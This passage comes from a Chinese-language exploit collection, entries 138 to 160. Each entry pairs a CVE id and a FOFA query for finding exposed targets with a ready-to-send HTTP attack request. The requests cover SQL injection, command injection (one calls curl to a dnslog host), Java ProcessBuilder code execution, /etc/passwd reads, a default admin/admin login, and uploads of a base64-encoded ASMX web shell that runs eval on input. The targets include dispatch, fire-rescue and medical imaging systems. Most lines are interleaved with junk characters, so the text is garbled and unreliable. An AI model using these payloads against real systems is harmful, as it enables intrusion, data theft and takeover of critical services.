& ?* G  r# {/ X9 ]/ }* N0 ^2 GConnection: close
6 X+ E4 @3 T3 H) Q" ^/ RCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
) j4 b+ J  e, DUpgrade-Insecure-Requests: 1% a8 @+ d7 V- a7 `; R: ~
' W  i+ T, H6 [/ _  U

- y: z  c5 X6 g3 Q+ X% F  |3 J138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
5 Q/ b/ t9 M- [, z8 ]. GCVE-2024-2621
- M7 q. |' z% t2 pFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"; y: d' i; h) P: u
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1( B2 D" _' W4 A- L1 o% B' R
Host: x.x.x.x. T4 P1 w+ d' [5 w4 H. ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ L6 f2 k5 V) U2 oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 |# e' m" u- r1 D7 G6 H% a& GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 N/ O" _/ X1 B2 u3 T5 ]3 x
Accept-Encoding: gzip, deflate, br8 |7 T. ~7 v6 z$ l1 t
Connection: close
7 o. G+ K  T$ K% ?Upgrade-Insecure-Requests: 1
' t) u0 A% v: @& ]+ o0 |6 M; j- k6 j% i2 E9 L, q, [

& ]: @0 k8 d+ N7 v: V3 S$ @- q139. 福建科立讯通信指挥调度平台editemedia.php sql注入
3 b3 S5 R" Q# v6 a$ ^# o8 C" pCVE-2024-2622: M, D' ~! w1 a& Z7 H  V
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"9 f, W2 r1 z/ A: w' e
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.16 @, l' n6 ?' g- f" }- P
Host: x.x.x.x
* l5 x" q; k/ R; R: y$ P" r: dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0$ d; t6 d8 G, y4 k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 G! Z+ ?$ y3 JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. ~4 M7 b. F; j( ~
Accept-Encoding: gzip, deflate, br% K& h) e. ^; }: o
Connection: close% x  ]$ Y4 j# x0 `
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
3 J# [8 H6 ]9 ~1 d: [; v( I& lUpgrade-Insecure-Requests: 1
9 e) D- v+ x8 T$ n7 [2 _) ]) Z2 W, S! o7 w# t

' ^4 k* H% k1 |: K: j( }2 v; |140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入5 z5 X  @$ F8 W* y% K, q
CVE-2024-25665 X+ V9 V$ M. ^" W) s
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台") y, u7 N5 N! {5 E( k' R
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1! n1 ~7 }' I) ]+ W( @8 o$ t
Host: x.x.x.x0 V( Y. R" x4 L  n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
  u7 R/ g; `. m! {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! C1 f/ {* J. g7 }: t7 q  h" Q" uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 |) i6 {7 O. ?9 j; A0 H8 JAccept-Encoding: gzip, deflate, br  g% b0 V/ o+ |& N7 q, A4 X
Connection: close0 F! k, k3 g( l3 d8 ^
Cookie: authcode=h8g9
3 a/ k" N4 s2 @" y2 G; eUpgrade-Insecure-Requests: 16 `$ I0 a/ U0 q" L- E, z

+ a9 _. r% n1 O( B) [7 p1 P" ]' V  D) }$ W$ ^( ]' }6 w
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
  |3 t+ O* S; g, ]  ?/ |FOFA:body="指挥调度管理平台"
, P) e) ~8 W; x* v9 fPOST /app/ext/ajax_users.php HTTP/1.1
/ L3 X( L$ U( Z- X; z) x. fHost: your-ip
: ?4 Z+ G" x% D4 |; y7 d/ uUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info8 s7 K' @& c5 `6 |
Content-Type: application/x-www-form-urlencoded& c. J& w8 p" _" e
( }. ?9 L9 a  C4 I1 q
" n2 `0 k/ ?( r3 J. x" w
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
# h# L" e( E: l* w7 V. i: x* r# t- q" ~
$ @; U9 M' J' h- m' S0 r
, @' Z" D% e! L' d142. CMSV6车辆监控平台系统中存在弱密码
  P6 o) ~' Q/ \/ a2 Q' b) ?CVE-2024-29666
0 M+ e1 e0 u' Z# Z: s6 `FOFA:body="/808gps/"
, ?1 c3 ]7 c' X$ R: @1 Nadmin/admin
9 `4 s& A2 c6 U# U$ m8 m& c143. Netis WF2780 v2.1.40144 远程命令执行
" w: I" @" q0 o6 @CVE-2024-25850
8 r; ~8 L2 m! I4 I: k0 F- c& qFOFA:title='AP setup' && header='netis'
+ Y( M/ s- X, |PAYLOAD8 Y- _. a( n7 i

2 j+ Y9 [+ ^0 t) Y" S6 n/ }144. D-Link nas_sharing.cgi 命令注入
: r5 B! H. p5 z4 d$ [7 ?# p0 nFOFA:app="D_Link-DNS-ShareCenter") _; U+ o, {7 H6 L. ?
system参数用于传要执行的命令
' _/ Y. E" D& BGET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
+ m. j% E+ }3 k, d4 ?Host: x.x.x.x
# i7 ]! b6 N  n3 |( x: m  @5 _7 zUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0+ q+ s9 U$ P2 ]
Connection: close* w( T- d+ j  H' d7 R) q
Accept: */*8 h% e# p7 U* H
Accept-Language: en
6 h; L. M3 H) G( bAccept-Encoding: gzip" [$ `0 t/ `; @: v
. `9 e6 }3 h& U$ d% ^2 y
: R+ D+ h6 e$ [: `! E
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
. X6 A8 T: a; f+ [: qCVE-2024-3400; |* b0 x2 g4 T, b% ^8 z
FOFA:icon_hash="-631559155"
$ s9 ]+ z3 A. j, s) QGET /global-protect/login.esp HTTP/1.1
( Q! ~5 |2 c: ]8 ]3 |$ K, U& jHost: 192.168.30.112:1005
, `' c0 t" z# ~* ~. }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84% u/ ?9 \$ {6 l0 @, r2 K4 {" B7 K
Connection: close$ A" R* I6 p4 n# ?8 e
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;, H7 |1 q2 N  {  ~5 ]2 K, h, W
Accept-Encoding: gzip, V% L' a1 r9 s3 k0 \  d9 [* `+ [
6 {; [: u% L/ u- A5 g+ \8 I

5 c/ {/ M& W* H* i; |% H+ k146. MajorDoMo thumb.php 未授权远程代码执行8 H4 q* i9 D7 B# r
CNVD-2024-02175( S$ u; |+ K+ f
FOFA:app="MajordomoSL"
( o' i( z. i% [, i' _GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.17 R' h  P, E0 _  e. ^0 Q
Host: x.x.x.x' {' a. ~0 {3 n. P* _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84+ ?) f  S; A4 l0 t: k
Accept-Charset: utf-8
/ x" @. b  r" ]: s: h, }Accept-Encoding: gzip, deflate
1 i* m5 w- D6 Q8 e7 GConnection: close
* o- ^. H$ G/ Q& D5 ], S$ j6 C; M8 q( u' u: S$ C: g, z
/ M0 y& V7 ^* T$ u- b
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
! y" d9 f# p4 xCVE-2024-32399# y$ E5 A( r+ Z9 h9 T9 y
FOFA:body="RaidenMAILD"
1 ~7 x4 x( e+ x0 S5 \2 fGET /webeditor/../../../windows/win.ini HTTP/1.1
$ b8 H% h9 Q5 I0 hHost: 127.0.0.1:81
- N9 h2 G5 ~6 [" H$ ACache-Control: max-age=08 K' v# S8 p9 K  p! g2 q0 M0 s
Connection: close
- C& r6 z& e! ]' Y# M. D  {% b& D! @5 S: K

- n5 w1 Y: u+ g! L0 _$ N148. CrushFTP 认证绕过模板注入; ~, H0 P$ Y: E1 ^' N5 o+ ~
CVE-2024-4040. Z  A1 e9 f4 k) y7 x, Z7 k
FOFA:body="CrushFTP"8 g" `2 ]  g% Y3 [
PAYLOAD+ C7 V$ d# ^$ N8 H3 `5 U
; i9 S' D: g7 ]0 L3 i# P" V/ S5 ~
149. AJ-Report开源数据大屏存在远程命令执行
* |  C8 k2 l  E3 Q4 `  HFOFA:title="AJ-Report"
! {! k! ?; P$ [4 u5 D# {# f6 \
5 j7 f5 K( x9 W- O; Q2 @POST /dataSetParam/verification;swagger-ui/ HTTP/1.18 F  _# Z; Y, B9 D# g! N
Host: x.x.x.x! M( O, R. g* z% S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 }3 K( D8 g% x& f: a+ r9 C: SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 h& V- c- T' e. T# k4 kAccept-Encoding: gzip, deflate, br
0 f% l4 a+ q* a7 R3 i8 q" zAccept-Language: zh-CN,zh;q=0.9
; t! ]/ P# a$ W9 L- |Content-Type: application/json;charset=UTF-8
7 y, R( u  ?& E' R- X) s) }/ zConnection: close8 S+ i0 o* j* _3 T4 a

! X6 W# k/ w( q6 \: l, S{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}- H; j# _! U7 E* S  R

6 d* P, c* e8 f150. AJ-Report 1.4.0 认证绕过与远程代码执行( D: V7 `2 \% c$ ]
FOFA:title="AJ-Report"6 Y9 N& _: U+ T6 A* ^
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1. k$ l1 T0 w2 o: M* f9 @
Host: x.x.x.x+ F' r* R0 m* p- S3 J. J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) H6 D9 O- T/ a) h  G3 d' RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& k8 ]  J. X% N) ?  wAccept-Encoding: gzip, deflate, br$ T8 ?0 ?) l, ~
Accept-Language: zh-CN,zh;q=0.9
4 o0 r: d6 k. q/ a* `Content-Type: application/json;charset=UTF-8
. L; M  G* Z3 O5 WConnection: close8 j2 R, p$ a6 ^3 A/ ]' v# N* {
Content-Length: 339
2 X: U+ B5 i. ?
3 v6 E" f+ U/ n{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
: c# O4 Q( ]/ y$ K. B) {; y3 O$ h+ V" v& T
7 K! |4 m9 o' l* O9 S* _+ I1 z
151. AJ-Report 1.4.1 pageList sql注入
4 l, `' y1 {/ i  n& d4 G/ f0 R, OFOFA:title="AJ-Report"2 P0 y- n$ q0 L* u
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1( Z: q, N9 h7 X/ z: }% b! T3 T5 V
Host: x.x.x.x7 J; L; W; a+ z8 x/ m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! Q/ O+ i3 H3 Q
Connection: close
) l# {- H6 d# j6 A* XAccept-Encoding: gzip
- c( C1 f  `3 Q, E. i/ {! D1 ~- H: B2 W6 [( y
& i# i% M$ q& ^% v1 ^0 b
152. Progress Kemp LoadMaster 远程命令执行7 D1 D# E# J+ t0 r" ?' f! Y6 [
CVE-2024-12123 X% Y, y) Z" s2 E6 k4 Q
LoadMaster <= 7.2.59.2 (GA)3 z0 w  V% C4 }' I" D
LoadMaster<=7.2.54.8 (LTSF)# S) M. d& i$ r* B( a8 @
LoadMaster <= 7.2.48.10 (LTS)& ~9 _2 Y$ D# u
FOFA:body="LoadMaster"
/ l. G) I( \" N+ J9 [$ |% M- H, xJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
# H6 ?) W) i2 H* n- l7 U; MGET /access/set?param=enableapi&value=1 HTTP/1.1
( d+ w* o. H  e, W3 g  uHost: x.x.x.x& T! y. i! T' K5 \) R- ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.11 K/ p- D3 n4 o: T# M
Connection: close2 `! c0 W: [$ @2 L" {9 }% \
Accept: */*, d7 O3 z  I5 G3 r9 v9 W, W
Accept-Language: en
: i! Y* ^2 O% P2 v. `Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=+ {, _; t) N" K& f( @# v
Accept-Encoding: gzip  P! W# q9 K# ]/ a

& d* y  b- S* |# t0 o+ h5 h' Z- M; ?2 _3 T6 ^
153. gradio任意文件读取
2 o7 U) q4 [5 F$ {! B4 j8 b( YCVE-2024-1561FOFA:body="__gradio_mode__"2 T) Q: p* ~, r9 v
第一步,请求/config文件获取componets的id: r- e3 a) Z! l: q
http://x.x.x.x/config; h/ U5 i* V& [: W& m

' h( A: t; O3 a9 `0 A4 l$ q  {! @  B  I; y/ \
第二步,将/etc/passwd的内容写入到一个临时文件' `/ U( I2 ]% O' v9 j
POST /component_server HTTP/1.15 `; @" x) P! m, p6 T3 c! k; _3 d
Host: x.x.x.x" e: M( u/ R7 t8 h+ A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3+ k  s9 m! d$ T: c
Connection: close% U: K9 l; V) @" _' T5 S+ {  u
Content-Length: 115
6 _. C% H, `1 LContent-Type: application/json
( T! k- d/ x. _( V% P0 Z6 X9 _Accept-Encoding: gzip
" H- w7 R0 z; r! @" f: {) a( p) D3 Z0 c# l  K
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}* e* @0 v! [7 z3 K- v! }! P

! }: @, k, Y7 I* c, y, u% U$ e8 n) Z' V
第三步访问
5 x  ]- R/ U0 e, p3 x& ]http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
, L- v0 t$ o7 r( @3 v9 ^9 q$ R' A, G( P' B1 B

) Z5 ?' l+ w. V; p154. 天维尔消防救援作战调度平台 SQL注入1 J1 c$ w4 v0 h+ Q' j* ^
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"2 E* u; O# Z7 |' E% Q" \
POST /twms-service-mfs/mfsNotice/page HTTP/1.17 @& i& k  c4 `. f+ ?3 |
Host: x.x.x.x
% n7 |& W5 G4 y$ Y1 vContent-Length: 106, e* K6 t9 m0 o: w9 o* Z) \# f
Cache-Control: max-age=08 k( \( }# L) _  S
Upgrade-Insecure-Requests: 1: ~, ^$ }3 b" {7 b
Origin: http://x.x.x.x
+ i# y/ n/ R4 E& PContent-Type: application/json
2 D0 |+ O2 F- Y' w1 N( I/ N! @# ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36& j4 y. ~9 V* ~: K6 g5 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) }$ G  Q4 g0 f
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page: v: K4 W3 _8 A
Accept-Encoding: gzip, deflate
) d# K3 ^5 e$ t$ }( yAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7  N( k" d4 p) {
Connection: close
7 u3 n6 i# o! p3 K! D5 {' E3 \
$ s9 i( F& s% C1 {{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
) h% Y% ~3 x/ j* s8 m5 Z  U- i6 w, p
. M  ]& O# [) l$ H0 @$ z; Z3 Z+ M+ _- X
155. 六零导航页 file.php 任意文件上传
: S# |: o4 M( _# S% N0 b2 R3 VCVE-2024-34982
' H& x& s3 Q7 ^' U# Y9 xFOFA:title=="上网导航 - LyLme Spage"5 r3 I$ i1 i5 Y- }2 ?; o' C; |" a
POST /include/file.php HTTP/1.12 X7 t$ x/ }" ^& R1 n+ e/ ]
Host: x.x.x.x$ p+ b, A3 s  m' {2 ?1 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
$ F! u) g5 d4 l. P, H% lConnection: close
. m4 @- ~; t- |8 gContent-Length: 232
# [7 r, B7 [9 aAccept: application/json, text/javascript, */*; q=0.01
* a/ g: b0 d+ T% O' e$ yAccept-Encoding: gzip, deflate, br
( R: J4 K4 P) K1 E; lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 ]+ a* Z/ V" U9 P! l0 J
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
  f/ m" ^% D3 B2 RX-Requested-With: XMLHttpRequest; ^2 l, V! ?8 e7 ^2 B

5 }) Z' W) c' X0 s-----------------------------qttl7vemrsold314zg0f
' V3 L$ p4 ?, \! c9 \- L) C, \Content-Disposition: form-data; name="file"; filename="test.php"& O8 F' q# \) [% p! v/ {
Content-Type: image/png/ b+ ^) `; U( g" H4 A) k

! I: {( E8 J: `/ K! w9 k0 y<?php phpinfo();unlink(__FILE__);?>) G4 }: L9 X" E( |# U
-----------------------------qttl7vemrsold314zg0f--
" D9 N- E* l  D+ S: @
1 F1 u8 u: p* V8 g6 S/ m
* T" l4 C( F9 G) c1 j+ q9 U9 o访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php2 U9 G; r9 w/ ]* U+ a* }
$ p$ }& ]4 U) t5 }/ r' n
156. TBK DVR-4104/DVR-4216 操作系统命令注入
/ U( _5 t& r' a0 M2 U  m" u7 ECVE-2024-37218 p2 S  S+ B, z; w" b
FOFA:"Location: /login.rsp"
, y" A" x; y) L9 p·TBK DVR-4104
  e$ g  m8 ?+ O9 v5 C3 v; i* o·TBK DVR-4216
' m* ~: `3 j1 u7 ycurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"# _6 r3 n& @8 K$ t/ E
4 v/ _* B0 _  Y7 |- P) Y

8 {- L/ T& P( r- [1 k6 TPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
. Q0 @7 L- P" q" AHost: x.x.x.x1 f" @* u* \/ k6 \% V$ y
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) u& {* n6 [% X# V* Y$ dConnection: close& N! [4 g$ R  w+ C  X* }* p- n0 C8 @
Content-Length: 0( G- h. {* x5 D1 M3 n4 a7 r
Cookie: uid=1
# x, L7 @# t8 l4 E  zAccept-Encoding: gzip
, h- M9 `3 h2 R" l0 m0 k- R6 m( R/ z8 b: }8 a  t6 ^# o4 N
( s. N. ^, o0 W- O! v
157. 美特CRM upload.jsp 任意文件上传
0 E! M! m3 f7 G" D# T% E+ ^CNVD-2023-06971
$ s# {' U1 |5 fFOFA:body="/common/scripts/basic.js"! M( b5 z+ K* {9 f9 q2 r6 a
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.15 E+ x+ k/ U; f6 U6 ~
Host: x.x.x.x
0 r" z# ^3 h- N6 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36: o. `9 z+ o  z, v
Content-Length: 709
4 Z; \0 s, v' Z, i5 X* @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. J' K- s, `: _# {# m9 F1 e7 V, vAccept-Encoding: gzip, deflate" @) `! ?: D% J& s8 x! g
Accept-Language: zh-CN,zh;q=0.9  T3 |$ N2 k. d* v9 C
Cache-Control: max-age=0
& O' q" P3 Y) z; UConnection: close
$ V/ ?2 O0 `/ z6 O# iContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN7 x+ c/ y; z3 c* Q
Upgrade-Insecure-Requests: 1
5 o" y1 p5 b8 c; V3 D' g
8 k8 D) S/ U7 ?( A% S% N; \7 g------WebKitFormBoundary1imovELzPsfzp5dN( S3 d- e8 c+ c8 P" S9 R
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
1 ?* y. F  R* k& \1 H2 `/ N5 [Content-Type: application/octet-stream
" [; ~0 R. u/ n4 h9 E, K# J" c% T, v8 \) W* V
nyhelxrutzwhrsvsrafb( I7 _, s  p) c6 ~/ d0 V; }+ Q* ?) T
------WebKitFormBoundary1imovELzPsfzp5dN
4 W% n, X; V: y2 VContent-Disposition: form-data; name="key"3 G7 s% X" {. B: b

3 L, j$ M1 T3 R9 R" a' S+ r+ enull( `  A1 S8 m9 p
------WebKitFormBoundary1imovELzPsfzp5dN  }! I" U& D% M4 ^
Content-Disposition: form-data; name="form"8 p; d3 K' o- a/ V/ l

* k4 E4 {# H( f: \* I# a% jnull
, E: `# W9 T, u% D! s------WebKitFormBoundary1imovELzPsfzp5dN& G8 d2 u% l" o1 d0 G5 j7 p% r
Content-Disposition: form-data; name="field"
, J5 w8 v* k4 |5 A0 Q6 J0 u+ ^# W* ]4 B) L
null
. m' G! s4 Y. S------WebKitFormBoundary1imovELzPsfzp5dN3 @  n% W2 g0 r" U/ j
Content-Disposition: form-data; name="filetitile"
2 c* _& F& C$ E2 L. ?* b8 x1 x& f( e: W7 N' Y
null, y% l* N! v0 M8 S# ?4 ?
------WebKitFormBoundary1imovELzPsfzp5dN7 O: f3 j* N1 F/ N9 _0 _6 C
Content-Disposition: form-data; name="filefolder"
# q  I- U4 a" o# U& [
$ J8 |. _( A# ]5 R% D  C. }% ^null
( c1 n. d: F5 }9 G" d9 `9 a  e  T------WebKitFormBoundary1imovELzPsfzp5dN--
3 R0 }5 A4 H! F  t0 i+ P/ ]
8 l: P; Q4 _1 V6 ^! Q- I, ?- \1 w! d, X' Z8 p
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
5 @& [( }" Z, }/ R3 A) u' n: b: v  M% l0 \
158. Mura-CMS-processAsyncObject存在SQL注入
- o3 Y$ a$ j, H! B) d% J. @8 nCVE-2024-32640
8 ]. l8 e& b  o  i5 YFOFA:"Generator: Masa CMS"
" ]* i% z5 R( X# B  R- s( Y5 }. IPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.10 Y6 u( f" G! v% l' M9 Q  }
Host: {{Hostname}}8 S* ^' m) t+ \+ c# M
Content-Type: application/x-www-form-urlencoded0 `, H& j  M$ [1 `: Y, f! r
9 X  m6 U) A9 y3 s& e/ y
object=displayregion&contenthistid=x\'&previewid=1' a1 H0 B2 ^9 \# o
, e$ e1 v- W, E0 ~1 X8 l

6 i) Z, B8 e4 g$ n/ ]! K% _+ k. E* E159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传# O! W% z! F6 {8 Z
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")! N# n( v8 S) Z* u" i! f
POST /webservices/WebJobUpload.asmx HTTP/1.17 D" L1 u$ Q) ~3 J
Host: x.x.x.x
& ^+ `7 O4 V" b6 b5 q1 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
4 f7 o9 f& @# D$ f; ^% m2 yContent-Length: 1080
! o6 n5 N0 k7 IAccept-Encoding: gzip, deflate
- e7 z. @* Y9 C8 {$ ^. x, H+ sConnection: close4 `4 X5 t- N5 F5 q9 Y2 N
Content-Type: text/xml; charset=utf-8
& ]3 i# o5 Q% h8 SSoapaction: "http://rainier/jobUpload"- h9 {5 s) f$ V
6 L1 j, W3 W- F& `& `
<?xml version="1.0" encoding="utf-8"?>- K0 s3 ?: e9 U) j/ X# e* l
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
3 B1 y8 j: R! N0 d9 |<soap:Body>1 T1 E. n9 Z/ J9 @0 j
<jobUpload xmlns="http://rainier">0 b: D$ ~# ]8 @- F3 e) A
<vcode>1</vcode>
! i+ s# d5 r5 L; @5 c' m<subFolder></subFolder>4 [7 |3 e$ a  W/ ]
<fileName>abcrce.asmx</fileName>  f3 l/ w, _  \4 a) A2 @  s
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>; J+ t. X# A7 ?' _9 B* S) o, y
</jobUpload>
. F- H1 T4 S2 J. l( q3 n</soap:Body>2 c) T* `! w2 K) y
</soap:Envelope>! {# U1 a& q7 f- m1 v# ?

! [& c( \( k) J$ J4 t. \: p3 v# @% k& n$ `) v- Y
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
& f( @# `! r5 f( m3 v* s  m6 V$ j0 ?2 W7 o- T9 w* ]* ?
  g* M( _" g' H' G
160. Sonatype Nexus Repository 3目录遍历与文件读取
( ~: r1 w+ o$ _CVE-2024-4956# i4 b+ D6 }( T& U) h/ [
FOFA:title="Nexus Repository Manager"
- `$ l& a9 Y. t5 c6 q2 FGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1, a# [1 `/ X% r2 d
Host: x.x.x.x% `, [! W2 X8 H4 p
